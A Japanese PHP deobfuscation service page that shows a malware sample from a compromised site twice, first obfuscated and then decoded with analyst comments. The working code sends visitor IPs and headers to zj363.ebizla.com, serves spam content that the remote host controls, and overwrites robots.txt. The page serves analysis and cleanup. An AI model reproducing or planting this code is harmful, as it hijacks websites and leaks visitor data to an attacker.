
PHP 難読化コードの復元・デコード

WordPress 等に埋め込まれた PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\6...



難読化されたPHPコード

<?php
 // Obfuscated specimen, reproduced unchanged for analysis.
 // Obfuscation layers visible in this text:
 //   - statements are shuffled and stitched back together with goto/label pairs
 //     (execution starts at label w3Ivq, which calls error_reporting);
 //   - string literals are written as mixed octal/hex escapes
 //     (e.g. "\x65\x78\x69\x74" is "exit", "\x70\151\x6e\x67" is "ping");
 //   - built-in function names use random letter case (PHP function names are case-insensitive);
 //   - small integers are written as round() of float sums (0, 1 and 10).
 // Decoded, the strings include $_SERVER key names, an http:// URL prefix, the
 // ".ebizla.com" domain suffix, "/robots.txt" and "HTTP/1.0 404 Not Found".
 goto w3Ivq; TOOF1: if (!($Qt2Pa == "\x65\x78\x69\x74")) { goto cb6Py; } goto TYptK; CV1GM: echo "\110\x54\x54\120\57\x31\56\x30\40\64\x30\x34\40\116\x6f\x74\40\106\x6f\x75\x6e\144\x5f\x5f\x5f" . $CBxOi . "\137\137\137" . $XRM8O; goto ocggp; kBrPR: if (!(PrEG_MaTcH("\x2f\152\160\62\x30\x32\63\57\x73\151", $_SERVER["\x52\105\x51\x55\105\123\x54\137\x55\122\x49"]) == RouND(0.4563 + 0.5437))) { goto x6KFI; } goto M6Q_C; vbJoC: Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.2296698 + 0.25431247 + 0.312 + 0.1049778 + 0.0985707)); goto Ut09H; LCNhg: $o2a8S = "\57\x69\x6e\144\145\170\x2e\x70\x68\x70\77\126\x53\75" . $XRM8O . "\46\x47\120\75" . $CBxOi; goto Kjf6N; suRfg: $CBxOi = "\172\152\63\x36\63"; goto LNU0T; Fq3XY: foreach ($RYHfB as $ET2jI) { goto ssJrr; Z4WnG: $lD0mT = STR_RepLacE("\57", "\137", $lD0mT); goto ZgQIx; qF2D1: $lD0mT = sTr_REpLAce("\x2b", "\55", $lD0mT); goto Z4WnG; ssJrr: $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : ''; goto Biu3V; ZgQIx: $lD0mT = sTr_rEplAcE("\x3d", "\56", $lD0mT); goto V0wO3; BUgcu: WfTDO: goto EIvGM; Biu3V: $lD0mT = Base64_eNCOde(TRIm($vhKCJ)); goto qF2D1; V0wO3: $o2a8S .= "\46" . $ET2jI . "\x3d" . 
$lD0mT; goto BUgcu; EIvGM: } goto pWfoe; rJUE7: Iw8Qi: goto CV1GM; Kjf6N: $RYHfB = array("\x53\103\122\111\120\x54\137\x4e\x41\x4d\105", "\122\x45\x51\x55\x45\x53\124\x5f\x55\x52\111", "\x48\124\x54\x50\x53", "\122\105\x51\125\105\123\124\x5f\123\x43\110\105\x4d\105", "\x53\105\122\x56\x45\122\x5f\x50\117\122\124", "\122\105\x4d\x4f\x54\105\137\101\x44\104\122", "\x48\x54\x54\x50\x5f\122\105\x46\105\122\x45\x52", "\x48\124\x54\x50\137\x41\103\x43\x45\120\x54\137\x4c\101\116\x47\x55\x41\x47\x45", "\x48\x54\x54\x50\137\125\x53\105\x52\x5f\101\107\105\116\124", "\110\x54\124\120\x5f\110\117\x53\124"); goto Fq3XY; FhED6: $at3DT = tRIm($yI5XT[roUnD(0.49818402 + 0.502)]); goto nn9ul; F4ugF: $tchaq = coUNT($yI5XT); goto I1Vb9; eT33f: ARRAY_POp($sawfx); goto PQr_Y; iqPOj: XdLk6: goto MhPsr; RKiUC: if (!empty($gJbJb)) { goto YiiVN; } goto Y5OsT; Ut09H: cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(6.9481 + 3.052)); goto MNFDU; xuJEc: MVSwC: goto DRTHq; FbCQX: goto ZlxT7; goto iqPOj; TYptK: exit; goto aApq5; o8VKE: $sawfx = ExplODE("\x3c\142\162\x2f\76", $at3DT); goto eT33f; aApq5: cb6Py: goto uf0dp; eN93L: echo $at3DT; goto xuJEc; mjifa: $e0cIs = "\125\163\145\162\55\141\x67\x65\x6e\x74\72\52" . 
PHP_EOL; goto c9DD1; nF5JG: gJDLR: goto FhED6; D4gH2: echo "\162\157\142\x6f\x74\163\56\164\170\164\40\x64\157\x6e\x65"; goto zc5T8; WjOu8: Rqv9t: goto lMegx; MhPsr: heADEr("\x48\124\124\120\57\x31\x2e\x30\40\64\x30\64\40\x4e\x6f\164\x20\x46\157\165\156\144"); goto Vm6tj; w3Ivq: ERrOr_REPORTiNg(RoUNd(0 + 0 + 0)); goto suRfg; mawLH: HEADeR("\x48\x54\x54\120\x2f\x31\56\60\x20\64\60\x34\x20\x4e\x6f\x74\x20\106\x6f\165\x6e\144"); goto rJUE7; M1Iy_: HEaDEr($AZiUQ); goto nF5JG; OtOqw: $gJbJb = tRIm($gJbJb); goto VQ511; O0T2T: YiiVN: goto OtOqw; dIQys: $t5UQ0 = curL_INIt(); goto UxwGz; UxwGz: cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H); goto vbJoC; y3Zt3: x6KFI: goto SKfIJ; Vm6tj: exit; goto yFiPV; MNFDU: $gJbJb = CUrL_ExeC($t5UQ0); goto l5L8K; L0BG4: curL_CLoSe($t5UQ0); goto RKiUC; ocggp: exit; goto y3Zt3; rxFXI: if (empty($AZiUQ)) { goto gJDLR; } goto M1Iy_; nn9ul: if (empty($at3DT)) { goto MVSwC; } goto eN93L; lMegx: fILe_PUT_CONtenTs($_SERVER["\104\117\103\125\115\x45\x4e\x54\x5f\x52\x4f\117\x54"] . "\57\162\x6f\142\x6f\x74\x73\x2e\x74\170\164", $e0cIs); goto D4gH2; M6Q_C: if (!(PReg_mAtch("\x2f\x6a\x70\62\60\x32\63\x63\x77\167\57\163\151", $_SERVER["\x52\x45\x51\125\x45\123\x54\x5f\125\122\x49"]) == rOUNd(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto Iw8Qi; } goto mawLH; zc5T8: exit; goto kiwFy; I1Vb9: if ($tchaq < 3) { goto XdLk6; } goto gT6kW; SKfIJ: $l2pTy = "\x68\164\164\160\72\57\x2f" . $CBxOi . "\x2e\x65\x62\x69\x7a\154\x61\56\x63\157\x6d"; goto LCNhg; VQ511: $yI5XT = eXPLoDE("\x7c\x40\x23\44\174", $gJbJb); goto F4ugF; c9DD1: $e0cIs .= "\x41\154\154\157\167\72\57" . PHP_EOL; goto o8VKE; Y5OsT: $gJbJb = FilE_get_cOnTeNts($CV76H); goto O0T2T; DRTHq: $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.29826 + 0.398166 + 0.3035714)]); goto TOOF1; kiwFy: ovD9C: goto FbCQX; l5L8K: $gJbJb = tRim($gJbJb); goto L0BG4; uf0dp: if (!($Qt2Pa == "\x70\151\x6e\x67")) { goto ovD9C; } goto mjifa; BiVrT: $CV76H = $l2pTy . 
$o2a8S; goto dIQys; pWfoe: dhC9N: goto BiVrT; LNU0T: $XRM8O = "\161\157\x31"; goto kBrPR; PQr_Y: foreach ($sawfx as $Tq_l3) { $e0cIs .= "\123\x69\164\145\155\141\x70\x3a" . $Tq_l3 . PHP_EOL; DCw8O: } goto WjOu8; gT6kW: $AZiUQ = TRim($yI5XT[rounD(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0)]); goto rxFXI; yFiPV: ZlxT7:

デコード(難読化解除)されたコード

<?php

// Analyst summary (decoder output, code left byte-identical):
// This script relays visitor and server details to a remote host over plain
// HTTP and then lets that host decide the HTTP response: one response header,
// the response body, and a trailing command ("exit", "ping", or anything else).
// The "ping" command overwrites DOCUMENT_ROOT/robots.txt with Sitemap entries
// supplied by the remote host.
// Indicators visible in this listing: outbound requests to zj363.ebizla.com with
// a query starting "/index.php?VS=qo1&GP=zj363", request paths containing
// "jp2023" / "jp2023cww", the response text "robots.txt done", and a robots.txt
// gaining unexpected "Sitemap:" lines.

// round(0) is 0: all PHP error reporting is switched off for this request.
ERrOr_REPORTiNg(RoUNd(0));
// Two short identifiers; they appear in the remote host name, in the VS/GP query
// parameters and in the marker string echoed at the end of the script.
$CBxOi = "zj363";
$XRM8O = "qo1";
// round(1.0) is 1, so this branch runs when REQUEST_URI does NOT contain
// "jp2023" (case-insensitive), i.e. for every ordinary request.
if (!(PrEG_MaTcH("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0))) {
    $l2pTy = "http://zj363.ebizla.com";
    $o2a8S = "/index.php?VS=qo1&GP=zj363";
    // $_SERVER keys whose values are sent out: requested path, scheme/port,
    // client IP address, referrer, accepted languages, user agent and host name.
    $RYHfB = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST");
    foreach ($RYHfB as $ET2jI) {
        // Missing keys are sent as an empty string.
        $vhKCJ = isset($_SERVER[$ET2jI]) ? $_SERVER[$ET2jI] : '';
        // Base64 with "+", "/" and "=" replaced by "-", "_" and "." so the value
        // can sit in a query string; outbound URLs therefore carry parameters
        // named after $_SERVER keys with base64-looking values.
        $lD0mT = Base64_eNCOde(TRIm($vhKCJ));
        $lD0mT = sTr_REpLAce("+", "-", $lD0mT);
        $lD0mT = STR_RepLacE("/", "_", $lD0mT);
        $lD0mT = sTr_rEplAcE("=", ".", $lD0mT);
        $o2a8S .= "&" . $ET2jI . "=" . $lD0mT;
    }
    $CV76H = $l2pTy . $o2a8S;
    // First attempt: cURL GET. The rounded constants are
    // CURLOPT_RETURNTRANSFER = 1 and CURLOPT_CONNECTTIMEOUT = 10 seconds.
    $t5UQ0 = curL_INIt();
    cUrL_seTOPt($t5UQ0, CURLOPT_URL, $CV76H);
    Curl_SetopT($t5UQ0, CURLOPT_RETURNTRANSFER, roUND(0.9995307700000001));
    cuRl_seTopT($t5UQ0, CURLOPT_CONNECTTIMEOUT, rOUnd(10.0001));
    $gJbJb = CUrL_ExeC($t5UQ0);
    $gJbJb = tRim($gJbJb);
    curL_CLoSe($t5UQ0);
    // Second attempt, only when cURL returned nothing: fetch the same URL with
    // file_get_contents().
    if (!empty($gJbJb)) {
        goto YiiVN;
    }
    $gJbJb = FilE_get_cOnTeNts($CV76H);
    YiiVN:
    $gJbJb = tRIm($gJbJb);
    // The remote reply is split on the literal separator |@#$| ("\$" is an
    // escaped dollar sign inside a double-quoted string).
    $yI5XT = eXPLoDE("|@#\$|", $gJbJb);
    $tchaq = coUNT($yI5XT);
    // Fewer than three fields (including an empty or failed fetch) ends the
    // request with a 404 status and no body. With errors suppressed above, a
    // site answering 404 on ordinary pages is one visible symptom when the
    // remote host is unreachable or blocked.
    if ($tchaq < 3) {
        heADEr("HTTP/1.0 404 Not Found");
        exit;
    }
    // Field 0: passed verbatim to header(), so the remote host chooses one raw
    // response header or status line for the visitor.
    $AZiUQ = TRim($yI5XT[rounD(0)]);
    if (empty($AZiUQ)) {
        goto gJDLR;
    }
    HEaDEr($AZiUQ);
    gJDLR:
    // Field 1 (round(1.00018402) is 1): echoed verbatim into the response, so
    // the page content served here is whatever the remote host returned.
    $at3DT = tRIm($yI5XT[roUnD(1.00018402)]);
    if (empty($at3DT)) {
        goto MVSwC;
    }
    echo $at3DT;
    MVSwC:
    // Last field (index count - 1): command word compared against "exit" and "ping".
    $Qt2Pa = trIm($yI5XT[$tchaq - rouND(0.9999974)]);
    if (!($Qt2Pa == "exit")) {
        if (!($Qt2Pa == "ping")) {
            // Any other command: stop here without exit. If this file was
            // included by another script, that script presumably continues
            // after the injected output - confirm against where the sample was found.
            // [PHPDeobfuscator] Implied script end
            return;
        }
        // "ping": rebuild robots.txt.
        // NOTE(review): decoder artifact in the next two lines. In the obfuscated
        // original the first is "User-agent:*" . PHP_EOL and the second is
        // $e0cIs .= "Allow:/" . PHP_EOL - PHP_EOL is the newline constant, not
        // literal text, and the second statement appends rather than reassigns.
        $e0cIs = "User-agent:*PHP_EOL";
        $e0cIs = "User-agent:*PHP_EOLAllow:/PHP_EOL";
        // The body field is reused as a "<br/>"-separated list; the last element
        // is dropped and each remaining one becomes a "Sitemap:" line.
        $sawfx = ExplODE("<br/>", $at3DT);
        ARRAY_POp($sawfx);
        foreach ($sawfx as $Tq_l3) {
            $e0cIs .= "Sitemap:" . $Tq_l3 . PHP_EOL;
        }
        // Overwrites the site's robots.txt in the document root; any existing
        // rules are lost, so restore the file from a known-good copy during cleanup.
        fILe_PUT_CONtenTs($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", $e0cIs);
        echo "robots.txt done";
        exit;
    }
    // "exit": nothing after the injected header/body is executed.
    exit;
}
// Reached only when REQUEST_URI contains "jp2023". A real 404 status header is
// sent unless the URI also contains "jp2023cww" (round(0) is 0 = no match).
if (!(PReg_mAtch("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == rOUNd(0))) {
    goto Iw8Qi;
}
HEADeR("HTTP/1.0 404 Not Found");
Iw8Qi:
// In both cases the body is a fake "404" line carrying the two identifiers:
// "HTTP/1.0 404 Not Found___zj363___qo1". This looks like a presence check for
// the script; the string is usable as a response-body signature when scanning.
echo "HTTP/1.0 404 Not Found___" . $CBxOi . "___" . $XRM8O;
exit;

